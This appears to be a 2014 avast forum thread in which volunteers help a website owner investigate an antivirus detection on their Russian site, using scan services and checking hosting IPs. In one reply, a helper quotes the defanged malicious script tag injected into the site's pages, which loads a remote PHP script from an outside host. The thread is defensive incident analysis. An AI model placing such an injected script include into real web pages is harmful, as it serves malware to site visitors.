Author Topic: Need help: JS:Includer-BBV [Trj] (Read 7051 times)

REDACTED · « **on:** December 05, 2014, 03:57:55 PM »

http://diveistochnik.ru

avast reports:

URL: hxxp://www.diveistochnik.ru/|{gzip}
Заражение: JS:Includer-BBV [Trj]

Is it really infected? What can I do to make avast not reporting this?

Eddy · « **Reply #1 on:** December 05, 2014, 05:00:59 PM »

https://www.virustotal.com/en/url/21c14c9f78d26884c038e6c15f087fc994f04d7c0a09299d08093e7b39f61b84/analysis/1417795220/
http://zulu.zscaler.com/submission/show/eed116143a72268c96d3425c6a81474f-1417795190

https://forum.avast.com/index.php?topic=53253.0

Quote

What can I do to make avast not reporting this?

Don't try to visit it.

Pondus · « **Reply #2 on:** December 05, 2014, 05:24:37 PM »

IP history - many domains on same IP and many are blacklisted https://www.virustotal.com/nb/ip-address/90.156.201.12/information/

114 websites hosted on that IP http://www.urlvoid.com/ip/90.156.201.12

REDACTED · « **Reply #3 on:** December 05, 2014, 05:40:24 PM »

Quote from: Pondus on December 05, 2014, 05:24:37 PM

IP history - many domains on same IP and many are blacklisted https://www.virustotal.com/nb/ip-address/90.156.201.12/information/

114 websites hosted on that IP http://www.urlvoid.com/ip/90.156.201.12

I am owner of this site, now it is at 90.156.201.42

Michael (alan1998) · « **Reply #4 on:** December 05, 2014, 05:42:58 PM »

http://www.ipvoid.com/scan/90.156.201.42/

Isn't any better there

REDACTED · « **Reply #5 on:** December 05, 2014, 05:44:32 PM »

Quote from: Eddy on December 05, 2014, 05:00:59 PM

Don't try to visit it.

I removed malicious link inside the file: http://diveistochnik.ru/O_CLUBE/index1.htm

reported by http://zulu.zscaler.com

is it not enough?

REDACTED · « **Reply #6 on:** December 05, 2014, 05:46:12 PM »

Quote from: Michael (alan1998) on December 05, 2014, 05:42:58 PM

http://www.ipvoid.com/scan/90.156.201.42/

Isn't any better there

Thank you, I will write to hosting support.

Michael (alan1998) · « **Reply #7 on:** December 05, 2014, 05:50:35 PM »

Your Previous score was 52/100 (Susipicous) remains pretty much unchanged.

http://zulu.zscaler.com/submission/show/eed116143a72268c96d3425c6a81474f-1417798051

After the index1.html file, you still have a CSS file and 2 HTM files.

If you hang for a bit, I shall ask Polonus to help you track the issue(s)

REDACTED · « **Reply #8 on:** December 05, 2014, 05:52:48 PM »

Quote from: Michael (alan1998) on December 05, 2014, 05:50:35 PM

If you hang for a bit, I shall ask Polonus to help you track the issue(s)

Yes, of course.

Pondus · « **Reply #9 on:** December 05, 2014, 05:56:16 PM »

Quote from: Michael (alan1998) on December 05, 2014, 05:42:58 PM

http://www.ipvoid.com/scan/90.156.201.42/

Isn't any better there

46 websites on that IP http://www.urlvoid.com/ip/90.156.201.42 and many blacklisted

IP history https://www.virustotal.com/nb/ip-address/90.156.201.42/information/

REDACTED · « **Reply #10 on:** December 05, 2014, 06:03:57 PM »

Quote from: Pondus on December 05, 2014, 05:56:16 PM

46 websites on that IP http://www.urlvoid.com/ip/90.156.201.42 and many blacklisted

IP history https://www.virustotal.com/nb/ip-address/90.156.201.42/information/

maybe the IP is not static, it is shared by many sites. now it is at 90.156.201.32

Michael (alan1998) · « **Reply #11 on:** December 05, 2014, 06:14:52 PM »

http://www.urlvoid.com/ip/90.156.201.32
https://www.virustotal.com/nb/ip-address/90.156.201.32/information/

IP's don't change that fast!!

polonus · « **Reply #12 on:** December 05, 2014, 06:26:07 PM »

I checked it on VirusTracker and up came: diveistochnik dot ru,90.156.201.32,ns1.masterhost dot ru,Multiple IPs,
See: http://www.worldguide.pt/clean-mx/viruses.php?domain=adversa.ru&response=
Persistent overdue malware used in PHISH-ing: http://support.clean-mx.de/clean-mx/phishing.php?netname=MASTERHOST-HOSTING&sort=id%20DESC%20&response=alive
See: https://www.virustotal.com/nl/url/21c14c9f78d26884c038e6c15f087fc994f04d7c0a09299d08093e7b39f61b84/analysis/
Also consider on IP: https://www.mywot.com/en/scorecard/90.156.201.12?utm_source=addon&utm_content=popup
Virus mails, spam mails and phishing mails: http://www.robtex.net/en/advisory/ip/90/156/201/12/
All the info we need here we find via the Quttera scan of that website:
Malicious code found ->

Code: [Select]

[[<!--f24624--><script type="text/javascript" src="htxp://aleksandr-motovilov.ru/qmxbjd7n.php?id=3692514"></script><!--/f24624-->]]

48 instances of this, see: http://quttera.com/detailed_report/diveistochnik.ru
blacklisted external links: diveistochnik dot ru/javascript:window[
diveistochnik dot ru/about:blank
Yandex blacklisted: More information

Yandex periodically checks websites to warn users about harmful webpages. The last check (less than two days ago) showed that this site contains malware. This can happen either in accordance with the owner's intent or due to the tampering of fraudsters.

Malware:

includes websites blacklisted by Yandex for distributing malware,
contains exploit (according to the Yandex behavior analyzer);
contains Troj/JSRedir-NZ (data provided by Sophos).
How Yandex verifies sites

Examples for Troj/JSRedir-NZ listed here: http://support.clean-mx.de/clean-mx/viruses.php?virusname=Troj/JSRedir-NZ&sort=id%20DESC

polonus

polonus · « **Reply #13 on:** December 05, 2014, 06:37:58 PM »

Hi Michael,

Site has hotlog and that is why it could have been compromised like with this: http://forums.cpanel.net/f5/warning-downloadable-shell-exploit-52043-print.html
See: htxp://diveistochnik.ru/O_CLUBE/index1.htm
As this is fortunately blocked by an extension in my browser: htxp://hit8.hotlog.ru/cgi-bin/hotlog/count

polonus

P.S. for the IPs verify this at domain hosting history - Peter Kleissner's scan gave me multiple IP domain as a result.
So we check here: http://toolbar.netcraft.com/site_report?url=http://diveistochnik.ru&refresh=1#history_table
See hosting history: Netblock owner   IP address   OS   Web server   Last seen
Masterhost.ru is a hosting and technical support organization.   90.156.201.42   FreeBSD   Apache   5-Dec-2014
Masterhost.ru is a hosting and technical support organization.   90.156.201.32   unknown   Apache   23-Jul-2011
Re: http://whois.domaintools.com/diveistochnik.ru

Damian

Michael (alan1998) · « **Reply #14 on:** December 05, 2014, 07:06:53 PM »

Quote from: pcls on December 05, 2014, 05:52:48 PM

Quote from: Michael (alan1998) on December 05, 2014, 05:50:35 PM

If you hang for a bit, I shall ask Polonus to help you track the issue(s)

Yes, of course.

And he's here! I would take his advice for what it is. He's quite smart :-). He's been doing this for a few years :-)

THank you Polonus!

Author Topic: Need help: JS:Includer-BBV [Trj] (Read 7051 times)

REDACTED

Need help: JS:Includer-BBV [Trj]

Eddy

Re: Need help: JS:Includer-BBV [Trj]

Pondus

Re: Need help: JS:Includer-BBV [Trj]

REDACTED

Re: Need help: JS:Includer-BBV [Trj]

Michael (alan1998)

Re: Need help: JS:Includer-BBV [Trj]

REDACTED

Re: Need help: JS:Includer-BBV [Trj]

REDACTED

Re: Need help: JS:Includer-BBV [Trj]

Michael (alan1998)

Re: Need help: JS:Includer-BBV [Trj]

REDACTED

Re: Need help: JS:Includer-BBV [Trj]

Pondus

Re: Need help: JS:Includer-BBV [Trj]

REDACTED

Re: Need help: JS:Includer-BBV [Trj]

Michael (alan1998)

Re: Need help: JS:Includer-BBV [Trj]

polonus

Re: Need help: JS:Includer-BBV [Trj]

polonus

Re: Need help: JS:Includer-BBV [Trj]

Michael (alan1998)

Re: Need help: JS:Includer-BBV [Trj]